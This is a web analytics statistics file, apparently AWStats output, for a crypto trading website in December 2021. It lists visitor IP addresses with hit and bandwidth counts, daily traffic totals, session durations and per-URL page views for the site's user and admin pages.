213.32.122.82 3 3 96716 20211227224640
162.158.179.44 0 28 52338 
162.158.179.222 0 12 380928 
23.251.102.74 6 6 193432 20211224034459
20.114.57.162 2 2 4084 20211207180350
97.94.93.58 7 7 14294 20211209185707
3.132.215.16 5 26 1974277 20211219044537
185.220.101.185 1 1 2042 20211207010734
162.158.178.212 0 2 7466 
172.70.98.35 0 1 761184 
167.94.138.60 1 1 47337 20211231191346
154.209.125.32 2 2 94674 20211229105229
45.90.61.161 1 1 12259 20211227190901
141.101.68.177 1 1 0 20211229034543
172.68.254.35 0 10 651990 
162.158.178.191 0 6 236232 
209.141.36.112 1 7 301844 20211228054618
162.158.89.98 0 1 234268 
45.90.60.209 1 1 12258 20211226165537
45.138.81.181 2 2 94674 20211229120612
172.69.252.135 1 7 596236 20211227100001
167.94.138.44 1 1 2042 20211206181043
192.241.208.46 1 1 2042 20211212171945
221.130.37.195 1 1 2042 20211207173840
23.251.102.82 2 2 94674 20211229085654
193.118.53.202 4 4 98758 20211231021005
221.130.37.180 2 2 4084 20211207173055
43.135.125.49 2 2 4084 20211208105157
128.14.133.58 4 4 98135 20211221143946
162.158.178.187 0 14 123830 
162.158.178.250 0 10 18920 
45.83.67.86 0 1 207542 
162.158.178.63 11 11 141900 20211230195407
167.99.170.36 0 1 11242 
101.36.107.222 1 1 2042 20211208110125
34.86.35.20 1 1 47201 20211225010211
128.199.15.215 1 1 2042 20211211182714
60.208.211.126 0 1 2621 
141.98.83.139 1 1 46714 20211216011156
188.114.110.169 0 1 11242 
172.68.254.129 2 2 48344 20211221125525
128.14.209.162 6 6 193432 20211231231803
119.78.76.117 0 1 160409 
162.158.179.15 0 20 570420 
162.142.125.57 1 1 46714 20211213230605
205.185.116.25 1 6 146465 20211231182359
141.101.68.81 0 1 234268 
139.59.77.211 1 1 47269 20211226052028
92.118.160.1 2 2 93779 20211219081550
167.94.138.57 4 4 73294 20211219005156
172.69.252.149 0 5 52518 
138.68.51.230 0 10 112420 
45.83.65.9 1 1 2042 20211208151634
50.116.0.64 0 15 168630 
167.248.133.114 2 2 49379 20211229153305
192.241.210.69 1 1 47337 20211226172604
162.158.178.83 0 18 332040 
193.118.53.194 6 6 148137 20211230001325
51.254.49.98 1 1 47405 20211229060322
192.241.209.101 1 1 47337 20211219133247
45.249.246.151 1 1 38137 20211209012609
117.141.116.188 3 3 103075 20211213035228
172.105.161.246 1 1 47337 20211228035044
103.114.158.1 1 10 198522 20211219223341
162.158.94.115 0 1 11242 
20.120.4.44 1 1 2042 20211209082156
162.142.125.193 1 1 47337 20211218054321
172.69.45.133 11 17 1258017 20211224051348
209.141.36.231 0 2 37896 
108.162.215.191 1 1 12900 20211218202927
108.162.215.179 0 1 62477 
71.6.167.142 2 2 93428 20211215121831
167.248.133.57 3 3 96716 20211222060940
150.255.35.125 0 1 2621 
188.114.111.182 1 1 47065 20211227172917
54.188.211.89 1 1 2042 20211211205825
172.69.45.145 1 2 17232 20211224051307
103.149.192.26 1 1 46714 20211214175117
71.6.147.254 1 2 122419 20211217054121
192.241.213.5 1 1 47337 20211229173905
162.158.179.129 0 10 1534020 
92.118.160.9 3 3 98892 20211231183425
207.32.219.48 2 2 4084 20211210044357
162.158.179.200 0 10 4585730 
134.122.39.246 1 2 176140 20211230231227
167.172.17.216 1 1 46714 20211213032330
108.162.229.193 1 1 47065 20211231061755
172.68.102.141 0 1 11242 
45.124.66.24 2 2 94674 20211230050348
159.203.161.89 1 1 2042 20211210113532
138.197.193.220 1 2 122419 20211213044814
61.147.15.67 1 1 47337 20211222162554
93.174.95.106 1 2 122419 20211216192533
141.101.68.111 0 1 86304 
192.241.212.233 1 1 2042 20211208164920
128.14.141.34 5 5 236062 20211231101606
141.101.69.166 3 3 95409 20211231055926
172.70.178.141 1 1 47065 20211219195739
124.126.78.134 1 13 1314717 20211218001258
162.158.179.100 0 5 5425 
176.53.220.37 1 1 2042 20211207171237
59.52.177.177 0 1 160409 
159.203.105.96 1 1 2042 20211206115936
162.158.179.40 2 17 2167439 20211221050311
45.90.60.149 1 1 12266 20211207174817
194.49.68.118 1 1 2042 20211207054258
192.241.208.213 1 1 47337 20211224134157
162.158.179.125 0 11 68971 
162.158.178.19 0 5 253225 
172.68.253.35 0 1 4129 
192.241.214.122 1 1 2042 20211210165332
172.70.98.127 0 1 34163 
141.101.69.116 2 2 93507 20211229031607
162.158.179.31 0 1 9584 
138.68.231.125 0 10 112420 
18.237.236.217 1 1 2042 20211209203350
172.69.45.137 6 9 378125 20211224051550
120.0.52.116 0 1 2621 
162.158.179.232 11 11 932492 20211230195407
165.227.131.62 1 1 2042 20211208180332
162.158.179.236 0 10 617700 
64.225.75.232 4 4 143430 20211222213623
162.158.179.144 2 2 48344 20211230192148
51.254.49.104 1 1 38104 20211229050135
172.105.189.111 1 1 47337 20211223210911
167.94.138.115 1 1 47337 20211221013232
176.53.219.199 1 4 421718 20211226175420
207.46.13.138 0 2 65798 
159.203.190.36 1 4 39670 20211230231623
192.241.207.204 1 1 10176 20211221235242
162.158.90.153 1 1 47337 20211227193552
35.86.141.218 1 1 2042 20211210202832
206.81.31.7 1 1 2042 20211212115123
192.241.215.159 1 1 47337 20211230173842
172.68.102.189 0 1 234268 
141.101.69.124 0 2 129320 
108.162.246.100 5 5 235325 20211230021115
80.82.77.139 1 1 2042 20211209102214
154.209.125.30 2 2 94051 20211218203222
192.241.213.153 1 1 46714 20211214180914
172.68.253.248 0 10 9660 
193.118.53.210 4 4 143430 20211231124201
172.68.253.73 0 6 768375 
207.46.13.215 0 2 115448 
45.83.66.12 0 1 11242 
92.118.160.37 1 1 47201 20211224213144
167.248.133.60 1 1 1437 20211206030200
192.241.215.51 1 1 47337 20211217125041
162.158.106.41 3 3 140572 20211226022921
147.182.152.176 3 13 254431 20211230231500
35.86.162.185 1 1 2042 20211206202759
192.35.168.96 1 1 46714 20211214092918
172.70.34.215 1 1 47065 20211217233654
108.162.246.54 2 2 94130 20211229025555
172.70.130.175 1 1 47065 20211219195739
176.53.222.137 1 1 12261 20211226185901
172.70.98.167 0 1 18486 
178.32.197.93 1 1 2042 20211207200033
141.101.69.76 0 1 4332 
162.142.125.41 1 1 2042 20211210062350
162.158.178.210 1 1 79444 20211230195407
172.70.98.81 0 1 3321 
162.158.106.147 3 3 141195 20211231024004
3.137.159.64 5 25 1859597 20211219124722
162.158.179.234 0 5 18580 
142.93.101.120 1 1 47337 20211219114445
142.93.153.57 0 10 112420 
162.158.179.146 0 1 58578 
162.158.179.220 8 48 946646 20211220104719
221.130.37.157 1 1 2042 20211207230651
23.250.19.242 1 1 47337 20211230134824
172.68.254.65 2 12 945634 20211227135316
172.68.254.157 0 31 3003630 
35.205.104.93 1 1 2042 20211209033607
154.209.125.29 1 1 2042 20211210103435
138.68.233.90 0 8 89936 
104.45.144.90 2 2 4084 20211210022513
162.158.179.59 0 20 223643 
172.70.98.89 0 1 86927 
172.70.222.87 0 1 11242 
34.208.182.210 1 1 2042 20211206202832
172.68.253.71 0 1 89478 
18.236.191.237 1 1 2042 20211207204536
162.158.179.9 0 20 1249540 
192.241.207.206 1 1 47337 20211221133652
45.90.62.110 1 1 12255 20211227165703
167.94.138.58 1 1 47337 20211226163521
192.241.213.56 1 1 47337 20211225134220
223.71.167.164 2 2 94674 20211222035932
167.71.139.52 2 13 409997 20211221021430
172.69.252.143 0 6 478014 
54.203.177.57 1 1 2042 20211207204457
180.149.125.163 1 1 47337 20211217211954
192.35.168.16 1 1 2042 20211206064434
172.69.252.141 2 7 644270 20211227100244
167.99.133.28 1 1 46714 20211214075930
162.158.179.163 13 13 537811 20211219163935
162.158.178.164 0 5 644015 
111.224.249.23 0 1 160409 
176.53.222.179 1 1 12255 20211207164025
180.149.125.173 1 1 2042 20211210214333
162.158.178.189 0 18 987019 
162.158.178.199 0 3 158805 
192.241.212.209 1 1 46714 20211213175426
162.158.107.200 4 4 188260 20211231023937
172.70.134.151 1 1 47337 20211228095412
43.130.49.124 1 1 47337 20211230082707
104.206.128.26 1 1 2042 20211210021140
167.248.133.43 1 1 47337 20211224005458
172.68.253.7 0 5 229945 
45.129.56.200 3 3 142011 20211230170557
3.87.107.98 4 4 186856 20211214072613
172.68.254.127 0 11 1029679 
34.207.101.187 13 13 615381 20211226205753
185.142.236.35 1 1 2042 20211212025039
162.158.179.29 0 20 1235400 
162.158.106.125 3 3 140572 20211230023137
154.89.5.71 1 1 38112 20211209013142
209.141.41.193 2 5 117843 20211228054620
172.69.45.139 0 3 181550 
172.68.102.127 1 1 47065 20211226172629
103.27.77.124 1 1 2042 20211212194319
172.70.98.129 0 1 28521 
162.158.179.231 11 11 159638 20211230195407
51.15.191.81 2 4 195781 20211231050340
128.14.134.170 7 7 104884 20211230104339
195.154.61.206 2 4 274268 20211229040330
162.142.125.43 1 1 47337 20211228122125
185.180.143.79 2 2 48756 20211216175608
108.162.245.131 2 2 94130 20211223021132
162.158.178.65 0 10 1604030 
172.68.254.177 0 4 12640 
167.94.138.42 2 2 24518 20211206030221
209.141.42.155 0 4 186224 
138.68.128.9 1 1 46714 20211213005019
211.154.194.21 1 1 47337 20211226002449
162.158.179.78 0 1 622 
108.162.215.93 0 1 61770 
34.96.130.24 1 1 2042 20211210074836
192.241.203.211 1 1 9646 20211214234833
162.158.178.165 0 3 85524 
3.133.85.240 1 1 46850 20211215231718
104.206.128.62 1 1 47337 20211224062051
34.86.35.5 1 1 47405 20211231114830
64.227.162.127 1 1 47337 20211228093449
172.68.253.57 0 4 639356 
167.248.133.113 4 4 49057 20211225193032
212.83.146.233 2 2 38104 20211229035216
185.67.34.1 1 1 38104 20211206072740
162.158.179.208 0 9 110313 
162.158.179.170 2 7 133044 20211223130049
172.69.252.133 1 5 252466 20211227100001
172.105.15.127 0 20 224840 
170.130.187.38 1 1 47337 20211222121138
192.35.168.80 1 1 47337 20211220083134
128.1.248.42 8 8 333401 20211230214543
221.130.37.148 1 1 2042 20211207172333
23.251.102.90 1 1 47337 20211217172402
104.140.188.34 1 1 2042 20211208064125
221.130.37.171 1 1 2042 20211208031414
176.53.217.115 1 1 12264 20211206174706
128.14.134.134 13 13 479496 20211229130141
172.68.254.75 11 11 149424 20211230195407
167.248.133.59 1 1 47337 20211226191708
162.158.179.55 10 20 2232280 20211230195327
162.158.179.152 0 10 624770 
108.162.215.199 0 1 64660 
172.70.175.58 1 1 47337 20211217233655
108.162.215.129 0 1 966 
206.189.54.222 1 1 47337 20211226130451
162.158.179.187 0 19 510668 
162.158.179.63 0 5 229945 
108.162.215.149 0 2 50651 
103.203.57.29 7 7 240146 20211230034648
162.158.50.70 1 1 47337 20211228192558
43.133.1.67 2 2 94674 20211224145523
34.77.162.31 1 1 38092 20211231040505
104.140.188.26 1 1 47337 20211218150521
92.118.161.53 1 1 46714 20211214104713
172.69.45.135 0 6 302499 
180.149.125.169 1 1 47337 20211231220821
162.158.179.198 0 8 29864 
51.254.49.97 2 2 40134 20211207220257
35.165.237.179 1 1 2042 20211209203259
34.86.35.10 1 1 38104 20211227234021
162.158.255.7 1 1 47337 20211221152049
108.162.215.177 0 1 128803 
172.69.45.143 1 3 139760 20211224051301
162.158.179.191 0 1 2690003 
172.68.253.61 0 6 94625 
94.232.46.171 1 1 46714 20211212211751
221.130.37.200 2 2 40134 20211207172538
104.206.128.6 1 1 47337 20211229074557
154.209.125.31 1 1 47337 20211222100431
59.36.168.250 1 1 2042 20211208222506
172.68.254.105 0 9 527202 
162.158.178.226 0 2 320240 
142.93.163.195 1 1 2042 20211210041950
162.158.179.33 0 30 103830 
66.240.236.116 2 2 94051 20211224081115
162.142.125.58 1 1 46714 20211215071921
162.158.107.222 2 2 94674 20211227115200
205.185.116.89 2 8 307350 20211231182348
172.68.253.63 0 1 3160 
162.158.179.60 4 4 59688 20211221060408
172.68.102.153 0 1 128803 
172.70.98.49 2 3 138073 20211218202926
34.216.177.126 1 1 2042 20211211205903
164.52.24.162 2 2 93428 20211215112916
162.158.178.77 0 10 3653410 
162.158.179.7 0 5 2085120 
183.136.225.9 4 6 185082 20211222220657
223.111.180.119 5 5 236685 20211218194457
172.68.254.121 0 1 13151 
18.197.32.46 2 2 4084 20211211155238
164.90.197.27 1 1 47337 20211221135611
143.198.123.120 0 10 112420 
71.6.135.131 3 6 175737 20211226191948
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 26
20211206 28 38 287313 21
20211207 34 34 198015 34
20211208 22 23 252466 20
20211209 37 37 147719 28
20211210 22 22 44924 21
20211211 11 11 22462 11
20211212 12 12 113712 12
20211213 16 20 1025021 14
20211214 17 19 906474 13
20211215 51 145 6970336 21
20211216 416 593 26006017 57
20211217 687 899 32565540 80
20211218 217 397 21020449 61
20211219 67 225 13984954 48
20211220 152 288 14665260 48
20211221 43 99 5589263 34
20211222 25 32 1543075 23
20211223 16 42 2753180 14
20211224 59 84 3960312 24
20211225 91 111 3287058 16
20211226 34 44 2673368 19
20211227 96 190 10666709 39
20211228 24 47 1769761 23
20211229 28 32 1523636 24
20211230 85 317 12226839 35
20211231 26 56 2482637 26
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
30s-2mn 21
15mn-30mn 12
2mn-5mn 14
0s-30s 681
1h+ 1
30mn-1h 31
5mn-15mn 6
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 146
/ 689 25310222 543 499
/placeholder-image/350x300 358 1521500 0 42
/assets/templates/basic/frontend/css/color.php 254 324866 4 38
/placeholder-image/undefined 110 197010 0 17
/user/crypto/rate 86 678 0 0
/admin/dashboard 52 4087862 6 0
/user/dashboard 45 1221072 3 0
/admin/setting/logo-icon 38 1878299 5 0
/admin/users 31 1608963 3 0
/login 29 288788 8 2
/assets/templates/basic/frontend/fonts/la-solid-900.woff2 27 2515552 23 24
/assets/templates/basic/frontend/fonts/la-brands-400.woff2 26 2119300 21 20
/assets/templates/basic/frontend/fonts/la-regular-400.woff2 26 322500 22 22
/admin/general-setting 25 1401042 3 0
/admin 21 123838 4 1
/user/trade-now 19 378515 1 0
/placeholder-image/800x800 15 250125 0 1
/admin/frontend/frontend-sections/app 15 825658 0 0
/admin/gateway/automatic 13 1212488 2 0
/admin/extensions 13 862947 0 0
/assets/admin/fonts/la-regular-400.woff2 12 154800 11 11
/assets/admin/fonts/la-solid-900.woff2 12 1161024 12 12
/user/deposit 12 371959 0 0
/assets/admin/webfonts/fa-regular-400.woff2 12 163008 11 12
/assets/admin/fonts/la-brands-400.woff2 12 1017264 11 12
/assets/templates/basic/user/fonts/la-brands-400.woff2 10 847720 10 10
/admin/users/login/history/3 1 48495 0 0
/admin/gateway/automatic/edit/paypal 2 140042 0 0
/admin/withdraw/approved 1 48597 0 0
/admin/draw/trade/log 1 46540 0 0
/blog/66/twitter.com 2 50858 0 0
/blog/67/linkedin.com 2 52124 0 0
/blog/88/linkedin.com 2 45450 0 0
/admin/wining/trade/log 2 97026 0 0
/admin/practice/trade/log 5 234843 0 0
/admin/email-template/global 7 349789 1 0
/blog/87/instagram.com 2 46678 0 0
/user/profile-setting 2 46540 0 0
/user/withdraw 3 67842 0 0
/admin/frontend/frontend-sections/call 3 151599 0 0
/blog/87/twitter.com 2 46662 0 0
/admin/email-template/212/edit 1 51753 0 0
/restapi.php 1 38104 1 1
/admin/trade/setting 9 490706 0 0
/placeholder-image/735x640 4 49700 0 1
/admin/frontend/frontend-sections/social_icon 1 63454 0 0
/blog/64/given-void-great-youre-good-appear-have-i-also-fifth 2 56554 0 0
/admin/report/commission 1 47081 0 0
/assets/templates/basic/frontend/fonts/la-regular-400.woff 2 30978 0 1
/admin/frontend/frontend-sections/footer 1 60554 0 0
/admin/user/trade/wining/2 1 47868 0 0
/contact 2 38540 0 0
/assets/templates/basic/user/fonts/la-solid-900.woff2 10 967520 10 10
/blog/66/instagram.com 2 50874 0 0
/admin/user/detail/3 1 77346 0 0
/cPanel_magic_revision_1616517441/unprotected/cpanel/fonts/open_sans/OpenSans-Bold-webfont.woff 1 22432 0 1
/menu/terms/70 2 56624 0 0
/register 5 167288 2 1
/user/practice/trade/log 1 20702 1 0
/admin/email-template/setting 3 155643 0 0
/admin/frontend/manage-section/3 2 122121 0 0
/blog/87/there-are-many-variations-of-passages-of-available-but-the-majority 2 47110 0 0
/blog/64/instagram.com 2 56242 0 0
/admin/frontend/frontend-sections/contact_us 5 254804 1 0
/placeholder-image/400x400 2 10464 0 0
/admin/email-template/index 4 258269 0 0
/blog/65/linkedin.com 2 50538 0 0
/admin/user/detail/2 8 614125 1 0
/assets/templates/basic/frontend/js/bootstrap.min.js.map 4 777740 0 2
/admin/withdraw/method 4 197240 0 0
/admin/user/detail/5 1 77346 0 0
/admin/users/email-unverified 4 191028 1 0
/ticket 2 42392 0 0
/admin/users/login/history/2 2 117139 0 0
/user/referra/log 2 41584 0 0
/user/trade/log 1 22305 0 0
/assets/templates/basic/frontend/fonts/la-solid-900.woff 2 250842 0 0
/admin/gateway/automatic/edit/coinpayments 8 680967 3 0
/admin/users/banned 3 141265 0 0
/assets/admin/js/vendor/bootstrap.bundle.min.js.map 1 315300 0 0
/blog/64/twitter.com 2 56226 0 0
/password/reset 2 15712 0 0
/admin/users/sms-unverified 1 46991 0 0
/services 2 55232 0 0
/user/withdraw/history 1 22319 0 0
/admin/seo 9 451613 1 0
/admin/losing/trade/log 2 93779 0 0
/menu/privacy/69 3 61199 1 0
/cPanel_magic_revision_1616517441/unprotected/cpanel/fonts/open_sans/OpenSans-Semibold-webfont.woff 1 22908 0 0
/admin/practice/wining/trade/log 2 94517 0 0
/user/game/result 1 1 0 0
/blog/67/given-void-great-youre-good-appear-have-i-also-fifth 2 52444 0 0
/admin/user/detail/4 5 381997 0 0
/admin/password 2 97327 0 0
/blog/65/given-void-great-youre-good-appear-have-i-also-fifth 2 50858 0 0
/admin/language/edit/2 1 57355 0 0
/menu/overview/85 2 40876 0 0
/blog/65/twitter.com 2 50530 0 0
/cPanel_magic_revision_1616517441/unprotected/cpanel/fonts/open_sans/OpenSans-Regular-webfont.woff 1 22660 0 0
/admin/frontend/manage-section/1 2 121413 0 0
/admin/crypto/currency/list 10 539883 0 0
/faq 2 44906 0 0
/admin/trade/log 9 431758 0 0
/blog/65/instagram.com 2 50546 0 0
/blog/66/lipsum-as-it-is-sometimes-known-is-dummy-text-used-in-laying-out-print-graphic-or-web-designs-t 2 51530 0 0
/admin/tickets 1 46427 0 0
/admin/deposit/pending 1 48365 0 0
/about 2 70004 0 0
/admin/gateway/manual 2 101615 0 0
/user/deposit/history 1 25398 0 0
/admin/practice/draw/trade/log 1 47254 0 0
/admin/frontend/frontend-sections/subscribe 1 48728 0 0
/user/play 1 77 0 0
/blog/64/linkedin.com 2 56234 0 0
/user/deposit/preview 3 63975 0 0
/admin/email-template/216/edit 3 148355 0 0
/assets/templates/basic/frontend/fonts/la-brands-400.woff 2 197346 0 0
/blog/66/linkedin.com 2 50866 0 0
/blog/67/twitter.com 2 52116 0 0
/blog/88/twitter.com 2 45442 0 0
/admin/subscriber 5 237879 0 0
/assets/images/logoIcon/ 3 0 3 2
/admin/users/active 6 310839 2 0
/admin/frontend/manage-pages 8 419617 2 0
/blog/88/uncover-many-web-sites-still-in-their-infancy-various-versions-have-evolved-over-the-years 2 46074 0 0
/assets/admin/webfonts/fa-solid-900.woff2 12 953328 10 9
/admin/report/transaction 2 106042 0 0
/admin/users/send-email 2 92876 0 0
/admin/profile 2 99041 0 0
/assets/templates/basic/user/fonts/la-regular-400.woff2 10 129000 10 10
/admin/users/commission/log/2 1 47112 0 0
/user/authorization 6 59814 1 0
/admin/language 9 509593 0 0
/admin/report/login/history 1 64232 0 0
/blog/87/linkedin.com 2 46670 0 0
/user/practice/trade 10 216214 0 0
/index.php 12 388438 12 5
/blog/67/instagram.com 2 52132 0 0
/blog/88/instagram.com 2 45458 0 0
// 1 46693 0 0
/admin/frontend/frontend-sections/trend 1 50325 0 0
/admin/practice/losing/trade/log 1 47260 0 0
/user/trade-now/BTC 4 126812 0 0
/admin/gateway/automatic/edit/perfect_money 1 63081 0 0
/user/commissions/history 1 20581 0 0
/user/transaction/history 4 94256 0 0
END_SIDER
